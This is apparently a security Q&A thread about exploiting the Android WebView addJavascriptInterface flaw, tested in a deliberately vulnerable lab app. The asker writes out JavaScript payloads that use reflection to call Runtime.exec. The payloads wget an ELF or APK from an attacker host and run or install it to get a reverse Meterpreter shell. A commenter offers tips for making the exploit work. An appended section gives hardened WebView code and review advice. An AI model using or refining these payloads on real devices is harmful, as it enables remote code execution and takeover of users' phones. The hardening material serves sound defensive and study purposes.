
I have been banging my head against this for almost 56 hours now (+/- a few that I took out for a couple of naps and Red Bulls) and have not been able to get anywhere with it so far.

I am trying to understand addJavascriptInterface in WebView on Android API 16 and lower, or in apps compiled against those APIs. The vulnerability itself has been pretty well explained here at the MWR blog.

For successful exploitation, the following Metasploit module helps: exploit/android/browser/webview_addjavascriptinterface

Using the above, I am able to get a reverse Meterpreter shell as soon as the victim visits the URL where I am listening.

The above works only on stock browsers on Android 4.1.2 and lower, as the browser itself has the mentioned vulnerability.

Now I was trying to understand the same in the context of an app, so I used a deliberately vulnerable app (InsecureBank V2).

The app uses WebView with JavaScript enabled, and I tweaked it to use addJavascriptInterface as well.

Now I am able to exploit the vulnerability and get some code executed as soon as the victim visits the vulnerable WebView.

The MWR blog above mentions a way to drop Weasel on the victim device through command execution and connect back to the attacker on a drozer server. But the way they have described it does not seem to work in my case.

Also, there are no Metasploit modules that exploit this kind of scenario. I am able to run wget and fetch a Meterpreter payload (tried x86 as an ELF binary / armle as an ELF binary / android as an APK) from my server onto the device. When I run these manually as the shell user, I get a successful Meterpreter session again. But if I try to do something of the format:

    function execute(cmd){
        return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
    }
    execute(['/system/bin/sh','-c','wget -P /sdcard/ http://192.168.56.102/shell.elf']);
    execute(['/system/bin/sh','-c','/sdcard/shell.elf']);

it just doesn't work. I do not get any reverse TCP session. Nor does the below work:

    <script>
    function execute(cmd){
        return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
    }
    execute(['/system/bin/sh','-c','wget -P /sdcard/ http://192.168.56.102/hack.apk']);
    execute(['/system/bin/sh','-c','/system/xbin/su pm install hack.apk']);
    </script>

or the below:

    <script>
    function execute(cmd){
        return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
    }
    execute(['/system/bin/sh','-c','wget -P /sdcard/ http://192.168.56.102/hack.apk']);
    execute(['/system/bin/sh','-c','su pm install hack.apk']);
    </script>

How do I execute the payload that I copied onto the victim's device using wget? Most of the resources I came across on the internet mention

  1. How to generate the Android-specific payload (msfvenom, drozer payload etc.)
  2. How to deliver it to the victim's machine (wget, for instance)

and then they say that once the payload is executed by the user, or the APK is installed by the user, we get a reverse TCP (etc.) session on the attacker machine.

No one explains how, through the code execution, the payload can be executed (APK installed / executable triggered).

Any help would be greatly appreciated.

  • I don't have time to write a full answer, but (1) is your JavaScript interface actually called "Android"? (2) Class.forName is a static method, so maybe it can't be run from an instance; it might be better to do something like ...getClass().getClassLoader().loadClass(...) etc. (3) I don't think malicious code necessarily needs to be on a device, it could be on the web; the point is that a vulnerable app (which uses addJavascriptInterface AND has a WebView that loads untrusted code) could load the malicious code inside the WebView, whether by XSS or site hijack etc. (Commented Sep 24, 2021 at 15:28)
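As an added illustration from the app developer's side (not code from the question, the comment, or InsecureBank V2), the WebView setup that exposes an app to this reflection path, next to the hardened form; `WebViewBridge`, the two bridge classes and both URLs are assumed names. The `@JavascriptInterface` annotation only takes effect when the manifest's `targetSdkVersion` is 17 or higher, so the hardened form assumes that as well.

```java
// Added example: a WebView bridge configuration that exposes the
// addJavascriptInterface reflection path, and a hardened counterpart.
// Assumes targetSdkVersion >= 17 in the manifest for the hardened case.
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

public class WebViewBridge {

    // Plain bridge object: for apps targeting API 16 or lower, every public
    // method (including Object.getClass()) is reachable from page JavaScript,
    // which is what the reflection chain in the question relies on.
    public static class LegacyBridge {
        public String getUser() { return "demo"; }
    }

    // Annotated bridge: on API 17+ only @JavascriptInterface methods are
    // exposed, so getClass() and the Runtime reflection chain are unreachable.
    public static class SafeBridge {
        @JavascriptInterface
        public String getUser() { return "demo"; }
    }

    // Vulnerable: JS enabled, unannotated bridge, content fetched from an
    // origin that a network attacker or XSS can control.
    public static void configureVulnerable(WebView wv) {
        wv.getSettings().setJavaScriptEnabled(true);
        wv.addJavascriptInterface(new LegacyBridge(), "Android");
        wv.loadUrl("http://example.com/"); // plain HTTP, untrusted content
    }

    // Hardened: register the bridge only on API 17+ (where the annotation is
    // enforced), drop the hidden bridges some older builds inject, and load
    // only the app's own origin over HTTPS.
    public static void configureHardened(WebView wv) {
        wv.getSettings().setJavaScriptEnabled(true);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            wv.addJavascriptInterface(new SafeBridge(), "Android");
        }
        // Known hidden interfaces added by older WebView builds; removing an
        // interface that is not present is a harmless no-op.
        wv.removeJavascriptInterface("searchBoxJavaBridge_");
        wv.removeJavascriptInterface("accessibility");
        wv.removeJavascriptInterface("accessibilityTraversal");
        wv.loadUrl("https://app.example/"); // assumed app-owned origin
    }
}
```

Reviewing an APK for this pattern means checking three things together: `targetSdkVersion` below 17, a bridge object passed to `addJavascriptInterface`, and a WebView that loads content the app does not control.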
